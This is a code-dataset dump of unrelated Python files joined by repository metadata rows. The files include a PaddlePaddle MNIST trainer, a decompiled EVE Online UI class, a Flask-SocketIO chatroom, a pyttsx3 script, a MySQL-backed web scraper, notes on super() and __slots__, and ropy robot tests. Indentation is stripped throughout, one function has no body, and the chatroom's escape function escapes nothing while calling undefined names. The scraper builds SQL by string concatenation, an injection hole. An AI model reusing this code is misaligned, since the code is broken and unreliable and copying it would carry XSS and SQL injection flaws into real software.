import paddle.v2 as paddle
import paddle.v2.dataset.common as common
from paddle.v2.reader.creator import cloud_reader
import os
import sys
import glob
import pickle
DC = os.getenv("PADDLE_CLOUD_CURRENT_DATACENTER")
DATASET_PATH = "/data/mnist/mnist-train-*"
def softmax_regression(img):
predict = paddle.layer.fc(input=img,
size=10,
act=paddle.activation.Softmax())
return predict
def multilayer_perceptron(img):
# The first fully-connected layer
hidden1 = paddle.layer.fc(input=img,
size=128,
act=paddle.activation.Relu())
# The second fully-connected layer and the according activation function
hidden2 = paddle.layer.fc(input=hidden1,
size=64,
act=paddle.activation.Relu())
# The thrid fully-connected layer, note that the hidden size should be 10,
# which is the number of unique digits
predict = paddle.layer.fc(input=hidden2,
size=10,
act=paddle.activation.Softmax())
return predict
def convolutional_neural_network(img):
# first conv layer
conv_pool_1 = paddle.networks.simple_img_conv_pool(
input=img,
filter_size=5,
num_filters=20,
num_channel=1,
pool_size=2,
pool_stride=2,
act=paddle.activation.Relu())
# second conv layer
conv_pool_2 = paddle.networks.simple_img_conv_pool(
input=conv_pool_1,
filter_size=5,
num_filters=50,
num_channel=20,
pool_size=2,
pool_stride=2,
act=paddle.activation.Relu())
# fully-connected layer
predict = paddle.layer.fc(input=conv_pool_2,
size=10,
act=paddle.activation.Softmax())
return predict
def main():
etcd_ip = os.getenv("ETCD_IP")
etcd_endpoint = "http://" + etcd_ip + ":" + "2379"
paddle.init(trainer_count=1)
# define network topology
images = paddle.layer.data(
name='pixel', type=paddle.data_type.dense_vector(784))
label = paddle.layer.data(
name='label', type=paddle.data_type.integer_value(10))
# Here we can build the prediction network in different ways. Please
# choose one by uncomment corresponding line.
# predict = softmax_regression(images)
# predict = multilayer_perceptron(images)
predict = convolutional_neural_network(images)
cost = paddle.layer.classification_cost(input=predict, label=label)
parameters = paddle.parameters.create(cost)
optimizer = paddle.optimizer.Momentum(
learning_rate=0.1 / 128.0,
momentum=0.9,
regularization=paddle.optimizer.L2Regularization(rate=0.0005 * 128))
trainer = paddle.trainer.SGD(cost=cost,
parameters=parameters,
update_equation=optimizer,
is_local=False,
pserver_spec=etcd_endpoint,
use_etcd=True)
def event_handler(event):
if isinstance(event, paddle.event.EndIteration):
if event.batch_id % 100 == 0:
print "Pass %d, Batch %d, Cost %f, %s" % (
event.pass_id, event.batch_id, event.cost, event.metrics)
if isinstance(event, paddle.event.EndPass):
result = trainer.test(reader=paddle.batch(
paddle.dataset.mnist.test(), batch_size=2))
print "Test with Pass %d, Cost %f, %s\n" % (
event.pass_id, result.cost, result.metrics)
trainer.train(
reader=paddle.batch(
cloud_reader([DATASET_PATH], etcd_endpoint), batch_size=10),
event_handler=event_handler,
num_passes=120)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
1c29302c75eba77721ac08ae1689249996414741
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/eve/client/script/ui/station/fitting/stanceSlot.py
|
4f84e19f8e8023622408b00954931ab6ab6a422f
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,646 |
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\stanceSlot.py
from carbonui.primitives.container import Container
from eve.client.script.ui.inflight import shipstance
import carbonui.const as uiconst
class StanceSlots(Container):
def __init__(self, **kw):
super(StanceSlots, self).__init__(**kw)
def _GetAngles(self):
return [ 258 - i * 10 for i in xrange(3) ]
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
typeID = attributes.typeID
if typeID is None:
typeID = sm.GetService('invCache').GetInventoryFromId(attributes.shipID).GetItem().typeID
self.shipstances = []
for angle in self._GetAngles():
pos = attributes.angleToPos(angle)
newPos = (pos[0],
pos[1],
32,
32)
self.shipstances.append(shipstance.ShipStanceFittingButton(shipID=attributes.shipID, typeID=typeID, parent=self, pos=newPos, align=uiconst.TOPLEFT, controller=self.controller))
def ShowStances(self, shipID, typeID):
btnControllerClass = self.controller.GetStanceBtnControllerClass()
shipStanceButtonsArgs = btnControllerClass().get_ship_stance_buttons_args(typeID, shipID)
for idx, kwargs in enumerate(shipStanceButtonsArgs):
stanceButton = self.shipstances[idx]
stanceButton.SetAsStance(shipID, typeID, kwargs['stanceID'], kwargs['stance'])
def GetStanceContainers(self):
return self.shipstances
|
[
"[email protected]"
] | |
012fafa0dcf896c1f493c2e14f2bedded9a3e5f2
|
66e8ea568dff28a9c596cf86021cf761ef3c4ec3
|
/blogs/chatroom/views.py
|
1225a438afaa8bb932937ad6e65877866aacbcc1
|
[] |
no_license
|
sharebrain/blog
|
df048df520f7f9a670f452afd57e62ffdcc0679a
|
d60a36f363fa61a86170367df0753654c44706a1
|
refs/heads/master
| 2021-01-23T22:31:31.408058 | 2017-09-10T06:42:21 | 2017-09-10T06:42:21 | 64,218,710 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,374 |
py
|
from . import chartroom
#from ..ext import socketio
from flask_socketio import send, emit, join_room, leave_room, disconnect, SocketIO
from flask_login import current_user
import functools
from flask import Flask, redirect, session, json, flash, url_for, render_template
import datetime
import time
app = Flask('blog')
app.config['SECRET_KEY'] = '123456'
socketio = SocketIO(app)
def excape_text(txt):
return txt.replace('<', '<').replace('>', '>')
def authenticated_only(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not current_user.is_authenticated:
disconnect()
else:
return f(*args, **kwargs)
return wrapped
@socketio.on('connect')
def join():
join_room()
@socketio.on('disconnect')
def leave():
leave_room()
@app.route("/confirm/<token>")
def confirm(token):
if current_user.confirmed:
return redirect(url_for("index"))
if current_user.confirm(token):
flash("You have already confirmed your account. Thanks!")
else:
flash("The confirmation link is invalid or has expired.")
return redirect(url_for("index"))
@socketio.on("join_user")
def on_new_user(data):
if current_user.username == data["user_name"]:
join_room(session["room"])
emit("new_user", {"name": data["user_name"]}, room=session["room"])
@socketio.on("leave")
def on_leave_room(data):
leave_room(session["room"])
session["room"] = None
redirect(url_for("index"))
@socketio.on("post_message")
def on_new_message(message):
data = {"user": current_user.username,
"content": excape_text(message["data"]),
"created": datetime.datetime.now().strftime("%a %b %d %H:%M:%S %Y"),
"room_id": session["room"],
"id": rc.incr(app.config["ROOM_CONTENT_INCR_KEY"])
}
emit("new_message", {
"user": current_user.username,
"time": datetime.datetime.now().strftime("%a %b %d %H:%M:%S %Y"),
"data": excape_text(message["data"])
}, room=session["room"])
@app.route("/room/<int:room_id>", methods=["GET", "POST"])
def room(room_id):
room_online_user_channel = app.config["ROOM_ONLINE_USER_CHANNEL"].format(room=room_id)
room_content_channel = app.config["ROOM_CONTENT_CHANNEL"].format(room=room_id)
room_info_key = app.config["ROOM_INFO_KEY"].format(room=room_id)
if session["room"] is not None:
session["room"] = None
session["room"] = str(room_id)
room_content_list = []
return render_template("room.html",
room_id=room_id,
users=room_online_users,
user_name=current_user.username,
messages=room_content_list)
@app.route("/rm_room/<int:room_id>", methods=["GET", "POST"])
def rm_room(room_id):
room_info_key = app.config["ROOM_INFO_KEY"].format(room=room_id)
room_info = json.loads(rc.get(room_info_key))
if room_info["creator"] != current_user.username:
flash("You are not the creator of this room!")
return redirect(url_for("index"))
room_content = app.config["ROOM_CONTENT_CHANNEL"].format(room=room_id)
room_online_user_channel = app.config["ROOM_ONLINE_USER_CHANNEL"].format(room=room_id)
flash("The room "+str(room_id)+" has been deleted.")
return redirect(url_for("index"))
|
[
"1261931128.com"
] |
1261931128.com
|
4a41c906501b7d076c709bb4f4f9350878881eda
|
535564a109a0b4b6f071e60063cd84bef2da8e33
|
/src/tts_pyttsx3.py
|
863ee02e5ee7d2846d8a5d62a93a32dc28e251b9
|
[] |
no_license
|
prijatelj/crowd_noise
|
84887d99737e63306f484ce00755131364a09ad1
|
60616a6dc5e66d6612762955dc345f294fdcd535
|
refs/heads/master
| 2020-03-23T07:03:09.747929 | 2018-07-17T03:38:18 | 2018-07-17T03:38:18 | 141,245,015 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,120 |
py
|
"""
A simple program that generates a mp3 audio file of multiple voices speaking
filler english over one another to simulate the noise from a background crowd of
voices speaking. This is to be able to speak in any language, so that any langauge of crowd background noise may be generated.
:author: Derek S. Prijatelj
"""
import pyttsx3
from gtts import gTTS
engine = pyttsx3.init()
voices = engine.getProperty('voices')
english_voices = [v for v in voices if any('en' in x for x in v.languages)]
def simple_crowd():
def other_speak(name, location, length):
print('word', name, location, length)
if location > 10:
engine.setProperty('voice', voices[8])
engine.connect('started-word', other_speak)
engine.say('The quick brown fox jumped over the lazy dog.')
engine.runAndWait()
def add_say(name, location, length):
if location > 10:
engine.say('Yo, I just added this phrase boyo!')
engine.runAndWait()
def onEnd(name, completed):
if not completed:
def main():
#engine.connect('started-word', add_say)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
09da3887cf75a54b9d1965126cebae0ddf5f6475
|
6929f9696a8f90b3778d449a199cee8891f3f739
|
/python_core/deligating_to_parent_class_and_slots.py
|
c23b6fab9843575d3946b69e50da5f32471b0dc8
|
[] |
no_license
|
chemplife/Python
|
881d492a4271fb2b423f2dd611eaac53a0efdc34
|
7fdfbf442a915e4f41506503baad4345a52d1e86
|
refs/heads/master
| 2022-12-31T20:00:22.475985 | 2020-10-19T20:14:43 | 2020-10-19T20:14:43 | 305,503,403 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,720 |
py
|
'''
super().method()/attribute
-> To deligate things back to the parent class.
-> Use this only when you have the same named function in the child as well.. Because Python anyways will look uo the heirarchy
if it does not find the method in Child-class.
Eg: class A:
def b():
class B(A):
def c():
return self.b() <- is same as -> return super().b() <- Because 'class B'' does not have 'def b()' of its own.
self: binds the instance of the object to the method anywhere in the herarchy.
** if the 'Parent-Class' has '__init__(seld, name)' method that takes in an argument and the 'Child-Class' does not have a '__init__(self)' defined:
-> 'Child-Class' instance need that argument (name) because it is inheritied from the 'Parent Class'
'''
class Person:
def hello(self):
print('In Person Class: ', self)
class Student(Person):
def hello(self):
print('In Student Class: ', self)
super().hello()
p = Person()
s = Student()
p.hello()
print('\n')
# Looks at the address of 'self'.. it is the same in 'Person Class' as it is for 'Student Class'
s.hello()
print('\n\n-------------------------------- Combined Example: Property/Inheritance/Deligate/Caching --------------------------------')
from math import pi
from numbers import Real
class Circle:
def __init__(self, r):
self.radius = r
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
@radius.setter
def radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle(Circle):
def __init__(self):
super().__init__(1)
u = UnitCircle()
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#But this will work..
u.radius = 10
print('\nProblem: UnitCircle Radius:', u.radius)
# To make the Radius for Unit-Circle read-only..
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return self.radius # return super().radius ;; will work the same.
# Now it will not work... even without setting u1.radius=10.. Because now, the 'self.radius' in 'circle.__init__()' does not take any argument.
# ** we cannot call the 'radius.setter' from outside of the class.
# u1 = UnitCircle_1()
# u1.radius = 10
# print('\nProblem: UnitCircle_1 Radius:', u1.radius)
# To fix, this, we need to make the 'self.radius' in 'circle.__init__()' call a method to set radius..
class Circle:
def __init__(self, r):
self._set_radius(r)
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
def _set_radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@radius.setter
def radius(self, r):
self._set_radius(r)
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return super().radius
u = UnitCircle_1()
print('\n')
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#Now this will not work..
# u.radius = 10
# print('\nProblem: UnitCircle Radius:', u.radius)
print('\n\n------------------------------------------- Slots -------------------------------------------\n')
'''
Class inherently use 'DICTIONARY' to store all the attributes.
But when we have a lot of instances of the class.. it will create a lot of memory-overhead..
To do it in a better 'memory-efficient-way'.. SLOTS are used
Slots- more compact datastructe that Python.
We need to tell slots what all attributes we will have in advance.
__slots__ = ('x', 'y')
('x', 'y') -> Iterable..
__slots__ -> tells Python that don't use dictionary.. use slots..
Now, Both of these will give error
-> obj.__dict__ : Attribute Error
-> vars(obj) : Tyoe Error
But -> dir(obj) : will tell us about 'x' and 'y'
Slots V/S Dict
-> Slots are 'Memory-Effecient' : Save 10 times the memory compared to Dict.
-> Slots are 'Time-Effecient' : Runs 30% faster then Dict.
-> Slots: Cannot add attributes (Monkey-Patching) during the program.. Dict, we can add attributes on the fly..
'''
class Location:
__slots__ = 'name', '_longitude', '_latitude'
def __init__(self, name, *, longitude, latitude):
self._longitude = longitude
self._latitude = latitude
self.name = name
@property
def longitude(self):
return self._longitude
@property
def latitude(self):
return self._latitude
print('Location Dict: ', Location.__dict__)
Location.map_service = 'Google Maps'
print('\nLocation Dict after Attribute Addition: ', Location.__dict__)
#But we don't have Instance-Dictionary
l = Location('Delhi', longitude=100, latitude=72)
# print('\nLocation Instance Dict: ', l.__dict__)
print('\n\n--------------------------- Slots with Single Inheritance ---------------------------\n')
'''
-> 'Child-Class' will use the 'slots' FROM 'Parent-Class' if present. But 'Child-Class' will have its own '__dict__' to store attributes.
-> 'Child-Class' can have 'slots' even if 'Parent-Class' DON'T have it. 'Child-Class' will still have a '__dict__' to store attributes.
-> If Child-Class also needs to have 'Slots', mention those in the 'Child-Class' which are not in 'Parent-Class'.. Don't re-mention attributes.
-> If re-mentioned:
-> In future updates from Python it will break (It is marked to have a 'check-on' in future.)
-> It hides the Parent Attribute and can cause problems.
-> Increase memeory overhead due to re-mentioning..
************************
How to use both 'Slots' and '__dict__'?
-> __slots__ = 'attributes', .. , '__dict__'
-> Now, we can add more attributes during run-time.. (__dict__ is not dropped..)
-> Nowly added attributes will get stored in '__dict__' and not in 'slots'
'''
class Person:
__slots__ = 'name'
class Student(Person):
pass
p = Person()
s = Student()
s.name = 'Alex'
print('Student Instance Dict: ', s.__dict__)
s.age = 18
print('\nStudent Instance Dict: ', s.__dict__)
# This will not work
#print('Person Instance Dict: ', p.__dict__)
|
[
"[email protected]"
] | |
97a283627d40ac164381cb4fb0e0cccbad16809d
|
c2f343d4affbb513e96730111ab9e7dfb6719102
|
/health/health_html_handler.py
|
33bfc4fed4d160867640ae9da5029484652ac8fa
|
[] |
no_license
|
hykruntoahead/projectSpider
|
f3cf2a156645ddfd7f677cf4cd1dae7c8c6d7e19
|
b19b93b9f838c865927ac6a7bdb330b6d543505f
|
refs/heads/master
| 2020-06-01T20:49:08.978750 | 2017-09-21T02:46:39 | 2017-09-21T02:46:39 | 94,084,496 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,588 |
py
|
#encoding=utf-8
import pymysql
import urllib2
from bs4 import BeautifulSoup
import time
class healthHandler:
def __init__(self):
self.base_path='E:\health_new_html'
self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'
self.headers = {'User-Agent': self.user_agent}
def use_databse(self):
conn = pymysql.connect(host='localhost', port=3306, user='root', passwd='123456', charset='UTF8')
cursor = conn.cursor()
cursor.execute("USE health")
return conn, cursor;
def query_all_item(self,conn,cursor):
sql = '''
select * from health_detail
'''
cursor.execute(sql)
rows=cursor.fetchall()
list_id=[]
list_type_id=[]
list_link=[]
for row in rows:
list_id.append(row[0])
list_type_id.append(row[2])
list_link.append(row[3])
return list_id,list_type_id,list_link
def insert_into_table(self,conn,cursor,title,source,desc,path,type_id,isnull):
sql ='''
insert into health_new_html values(null,%s,%s,%s,%s,%d,%d)
'''%("'"+title.replace("'"," ")+"'","'"+source+"'","'"+desc.replace("'"," ")+"'","'"+path+"'",type_id,isnull)
cursor.execute(sql)
conn.commit()
def parser_html(self,conn,cursor,id,type_id,url):
# req = urllib2.Request(url.encode('utf-8'), headers=self.headers)
try:
cont = urllib2.urlopen(url,timeout=5).read()
except:
try:
cont = urllib2.urlopen(url,timeout=10).read()
except:
try:
cont = urllib2.urlopen(url, timeout=20).read()
except:
cont = urllib2.urlopen(url, timeout=30).read()
try:
soup = BeautifulSoup(cont,'html.parser',from_encoding='utf-8')
except:
soup = BeautifulSoup(cont, 'html.parser', from_encoding='utf-8')
main = soup.find('div',class_='main_left')
hart_box = main.find('div',class_='border omanbg1 art_box')
h1=hart_box.find('h1')
title=h1.get_text().strip()
hsource=hart_box.find('div',class_='date')
source =hsource .get_text().strip()
hsum = main.find('p',class_='summary')
summary = hsum.get_text().strip()
hcontent = main.find('div',class_="art_con",id='contentText')
isnull = 0
if(hcontent.get_text().strip()=='div>'):
isnull = 1
path = self.base_path+"\health_new_%d.html"%id
fout = open(path, 'w')
fout.write('<!DOCTYPE html>')
fout.write("<html>")
fout.write('''
<head>
<meta charset="UTF-8">
</head>
''')
fout.write("<body>")
fout.write('<div>')
fout.write(str(h1))
fout.write(str(hsource))
fout.write(str(hsum))
fout.write(str(hcontent))
fout.write('</div>')
fout.write("</body>")
fout.write("</html>")
fout.close()
self.insert_into_table(conn,cursor,title,source,summary,path,type_id,isnull)
print 'craw id;%d---title:%s---isnull:%d'%(id,title,isnull)
def start(self):
conn,cursor = self.use_databse()
list_id,list_type_id,list_link = self.query_all_item(conn,cursor)
for id in list_id:
if id >109775:
self.parser_html(conn,cursor,id,list_type_id[id-1],list_link[id-1])
spider = healthHandler()
spider.start()
|
[
"[email protected]"
] | |
619b3e46c9ac6ad81397f6fdc1a93e95e079f237
|
cfc8a4c44572eea1e9c45059ea86ce7b47dbc1d6
|
/util.py
|
8b24532fc14d50c62138744a382a3c6d1c680792
|
[] |
no_license
|
wi1k1n/encryptmeallbot
|
b581546d5c14e2098e310a5d2c80da323311e369
|
6f1436d94b0ac1e250730e8e4ee076120f991816
|
refs/heads/master
| 2022-03-27T00:26:07.772725 | 2019-12-30T01:01:23 | 2019-12-30T01:01:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 305 |
py
|
def inann(dict, key):
""" Takes dictionary and key and checks if key in dictionary and it is not None """
return key in dict and not dict[key] is None
def ninann(dict, key):
""" Takes dictionary and key and checks if key not in dictionary or it is None """
return not key in dict or dict[key] is None
|
[
"[email protected]"
] | |
75d414b298db2aa082fc712ad544fc4a0a1c73a5
|
03b5c9f92bfc14e778e91ea5459eeb71d6dbc920
|
/urionlinejudge/1_begginer/p1049.py
|
f675e730bac486f395d7f26ff4c64d2b98ad60d8
|
[] |
no_license
|
vitorTest/dailyExercBckp
|
f45c16ac23daa4843ec21ebd56bb8e8f103b91e5
|
9730d63eeab816d017b055ddbdf0ca173b375667
|
refs/heads/master
| 2021-06-23T12:05:28.236046 | 2020-11-13T01:16:29 | 2020-11-13T01:16:29 | 143,309,859 | 0 | 0 | null | 2020-11-13T01:16:30 | 2018-08-02T15:01:10 |
C++
|
UTF-8
|
Python
| false | false | 451 |
py
|
#!/usr/bin/env python
dict_set = {
'vertebrado': {
'ave': {'carnivoro': 'aguia', 'onivoro': 'pomba'},
'mamifero':{'onivoro': 'homem', 'herbivoro': 'vaca'}
},
'invertebrado':{
'inseto': {'hematofago': 'pulga', 'herbivoro': 'lagarta'},
'anelideo': {'hematofago': 'sanguessuga', 'onivoro': 'minhoca'}
}
}
classe1 = input()
classe2 = input()
classe3 = input()
print(dict_set[classe1][classe2][classe3])
|
[
"[email protected]"
] | |
8359bb272673094265dc59a86fd09d4bc0ff155c
|
afcf07b66dae1b2b771b0ebc81159268ed0cd5f8
|
/share/qt/clean_mac_info_plist.py
|
35acc2d45b3ebfe43bbab133e94586e406155951
|
[
"MIT"
] |
permissive
|
USDX/USDX-Coin
|
e20e20b84c187f5850f8ca201d49c5769eb3c108
|
6977d065031598149b1ff51c02c8549eeb77e0b4
|
refs/heads/master
| 2020-04-10T07:34:38.102807 | 2018-12-09T18:30:39 | 2018-12-09T18:30:39 | 160,883,821 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 889 |
py
|
#!/usr/bin/env python
# Jonas Schnelli, 2013
# make sure the USDX-Qt.app contains the right plist (including the right version)
# fix made because of serval bugs in Qt mac deployment (https://bugreports.qt-project.org/browse/QTBUG-21267)
from string import Template
from datetime import date
bitcoinDir = "./";
inFile = bitcoinDir+"/share/qt/Info.plist"
outFile = "USDX-Qt.app/Contents/Info.plist"
version = "unknown";
fileForGrabbingVersion = bitcoinDir+"bitcoin-qt.pro"
for line in open(fileForGrabbingVersion):
lineArr = line.replace(" ", "").split("=");
if lineArr[0].startswith("VERSION"):
version = lineArr[1].replace("\n", "");
fIn = open(inFile, "r")
fileContent = fIn.read()
s = Template(fileContent)
newFileContent = s.substitute(VERSION=version,YEAR=date.today().year)
fOut = open(outFile, "w");
fOut.write(newFileContent);
print "Info.plist fresh created"
|
[
"[email protected]"
] | |
0f9df2409f2f99b65ed93ad09dd48af4b68c6b34
|
14de770dcab530aa23a8811a304499cb7ccc93ed
|
/plot_hashcodes.py
|
36c1cc74d4a728a16bc00acf27439a96ec222c09
|
[] |
no_license
|
gsig123/SpectralHashing
|
4cd788460347421e2c9de514bf7ddf66a534b061
|
d8e47c6575f7b5773e77b8ae2df37c8d36538ffd
|
refs/heads/master
| 2020-03-17T07:05:35.548619 | 2018-05-14T16:36:14 | 2018-05-14T16:36:14 | 133,382,913 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,372 |
py
|
"""
Plot the input data with colors according to their assigned hashcodes,
as well as the principal components.
Only works for 2d data
"""
import argparse
import importlib
import pickle
import matplotlib.pyplot as plt
import numpy as np
from helpers import normalize_data
def to_binary(val, length):
"""convert a number to a binary string"""
return bin(val)[2:].rjust(length, '0')
def read_args():
"""Read arguments"""
parser = argparse.ArgumentParser()
parser.add_argument("-model", help="full path to the visualized model", required=1)
parser.add_argument("-input", help="full path to the input data", required=1)
parser.add_argument(
"-compressor",
help="A module containing a compress(data_norm, sh_model, label) function",
default="Compressors.vanilla")
return parser.parse_args()
def main():
"""Create the plot"""
args = read_args()
compressor_file = args.compressor
compressor = importlib.import_module(compressor_file)
model = pickle.load(open(args.model, 'rb'))
input_data = np.genfromtxt(args.input, delimiter=' ', dtype=np.float)
principal_components = model.pc_from_training
input_data_norm = normalize_data(input_data)
_, hash_codes = compressor.compress(input_data_norm, model, model.training_filename)
# Split depending on assigned hash values
hash_buckets = [[] for _ in range(0, 2**model.n_bits)]
for point, hash_val in zip(input_data_norm, hash_codes[:, 0]):
hash_buckets[hash_val].append(point)
# Plot differently colored points, depending on hash
legend_handles = []
for hash_val, points in enumerate(hash_buckets):
x_coords = list(map(lambda x: x[0], points))
y_coords = list(map(lambda x: x[1], points))
points, = plt.plot(x_coords, y_coords, '.', label=to_binary(hash_val, model.n_bits))
legend_handles.append(points)
# Plot principal components
for principal_component in principal_components:
# Eigenvectors were flipped during training
plt.plot([0.5, 0.5+principal_component[1]/2], [0.5, 0.5+principal_component[0]/2], 'r')
# Show legend outside to the right
plt.legend(bbox_to_anchor=(1.04, 0.5), loc="center left", handles=legend_handles)
# Ensure there is enough space for the legend
plt.subplots_adjust(right=0.8)
plt.show()
main()
|
[
"[email protected]"
] | |
17a97046bb0fa80ed31b646a4f2626fd6e046550
|
cbe5c3cd7dcf810b5f120a7ec9872ed665a9c5c2
|
/Eval.py
|
d44dab3c5980d0c9a3a57303d8ef4cf0793dacbf
|
[] |
no_license
|
sagarmane123/IMDB-data-analysis
|
590a5af3ff72fad7b6eb9cee3bb84270b3c8d5af
|
d0f83c8dab6bb45f3f0396935c02b0d7eac74edf
|
refs/heads/master
| 2020-03-19T02:05:49.120004 | 2018-05-31T15:03:13 | 2018-05-31T15:03:13 | 135,598,966 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 830 |
py
|
import numpy as np
class Eval:
def __init__(self, pred, gold):
self.pred = pred
self.gold = gold
def Accuracy(self):
return np.sum(np.equal(self.pred, self.gold)) / float(len(self.gold))
def EvalPrecition(self):
pos = np.argwhere(self.gold == 1).flatten()
neg = np.argwhere(self.gold == -1).flatten()
TP = np.sum(np.equal(np.array(self.pred)[pos], np.array(self.gold)[pos]))
FP = np.sum(np.not_equal(np.array(self.pred)[neg], np.array(self.gold)[neg]))
return TP/(TP+FP)
def EvalRecall(self):
pos = np.argwhere(self.gold == 1).flatten()
TP = np.sum(np.equal(np.array(self.pred)[pos], np.array(self.gold)[pos]))
FN = np.sum(np.not_equal(np.array(self.pred)[pos], np.array(self.gold)[pos]))
return TP/(TP+FN)
|
[
"[email protected]"
] | |
7b24f503677d127cc2602c78837c258a0b4b2004
|
25356a5460a6791ebbfcdae76051e8fcb2d6995f
|
/P002/Python/numba_copyMatrix.py
|
4023125d7edb1912d9d7cd3f34b8735263f5bdd7
|
[] |
no_license
|
Foadsf/LangBench
|
4956d9fb199d05705cb15429973346029c37fe55
|
f772df47d3d5316e4e644ed7985b2c434164835d
|
refs/heads/master
| 2020-04-10T19:10:58.764629 | 2018-12-10T21:44:42 | 2018-12-10T21:44:42 | 161,226,128 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 883 |
py
|
#!/usr/bin/env python
import sys
if len(sys.argv) < 1:
print 'Usage:'
print ' ./copyMatrix.py dim'
print 'Please specify matrix dimensions'
sys.exit()
from numpy import *
from time import *
from numba import jit
dim = int(sys.argv[1])
# Copy with loop
#----------------
@jit
def serial_copy(A):
for i in range(dim):
for j in range(dim):
A[i,j,0] = A[i,j,1]
A[i,j,2] = A[i,j,0]
A[i,j,1] = A[i,j,2]
@jit
def vectorized_copy(A):
A[:,:,0] = A[:,:,1]
A[:,:,2] = A[:,:,0]
A[:,:,1] = A[:,:,2]
A = random.rand(dim,dim,3)
start = clock()
serial_copy(A)
finish = clock()
print 'Time for copy with loops: ', finish - start,'s'
print
# Vectorized Copy
#----------------
A = random.rand(dim,dim,3)
start = clock()
vectorized_copy(A)
finish = clock()
print 'Time for vectorized copy: ', finish - start,'s'
print
|
[
"[email protected]"
] | |
85614f4b027e1a236f12c98d6e2f0dbb9b39b778
|
2425ad0e81a695eb126b31f2ccf82dfd478851c3
|
/tests/test_ets.py
|
d8636cb441a212b3bfaa502b4e83c50a972f032f
|
[
"MIT"
] |
permissive
|
jhavl/ropy
|
62ab28297ae7e4ee6076009777d28aff98fdb2a2
|
38b12369530253a16c22ef1f5be0bcb75053ffd8
|
refs/heads/master
| 2021-01-07T20:39:00.899851 | 2020-11-29T10:35:24 | 2020-11-29T10:35:24 | 241,814,788 | 17 | 3 |
MIT
| 2020-04-29T05:36:43 | 2020-02-20T06:55:34 |
Python
|
UTF-8
|
Python
| false | false | 22,573 |
py
|
#!/usr/bin/env python3
"""
Created on Fri May 1 14:04:04 2020
@author: Jesse Haviland
"""
import numpy.testing as nt
import numpy as np
import ropy as rp
import unittest
import spatialmath as sm
class TestETS(unittest.TestCase):
def test_panda(self):
panda = rp.Panda()
qz = np.array([0, 0, 0, 0, 0, 0, 0])
qr = panda.qr
nt.assert_array_almost_equal(panda.qr, qr)
nt.assert_array_almost_equal(panda.qz, qz)
nt.assert_array_almost_equal(
panda.gravity, np.array([[0], [0], [9.81]]))
def test_q(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
panda.q = q1
nt.assert_array_almost_equal(panda.q, q1)
panda.q = q2
nt.assert_array_almost_equal(panda.q, q2)
panda.q = q3
nt.assert_array_almost_equal(np.expand_dims(panda.q, 0), q3)
def test_getters(self):
panda = rp.Panda()
panda.qdd = np.ones((7, 1))
panda.qd = np.ones((1, 7))
panda.qdd = panda.qd
panda.qd = panda.qdd
def test_control_type(self):
panda = rp.Panda()
panda.control_type = 'v'
self.assertEqual(panda.control_type, 'v')
def test_base(self):
panda = rp.Panda()
pose = sm.SE3()
panda.base = pose.A
nt.assert_array_almost_equal(np.eye(4), panda.base.A)
panda.base = pose
nt.assert_array_almost_equal(np.eye(4), panda.base.A)
# def test_str(self):
# panda = rp.Panda()
# ans = '\nPanda (Franka Emika): 7 axis, RzRzRzRzRzRzRz, ETS\n'\
# 'Elementary Transform Sequence:\n'\
# '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]\n'\
# 'tool: t = (0, 0, 0.103), RPY/xyz = (0, 0, -45) deg'
# self.assertEqual(str(panda), ans)
# def test_str_ets(self):
# panda = rp.Panda()
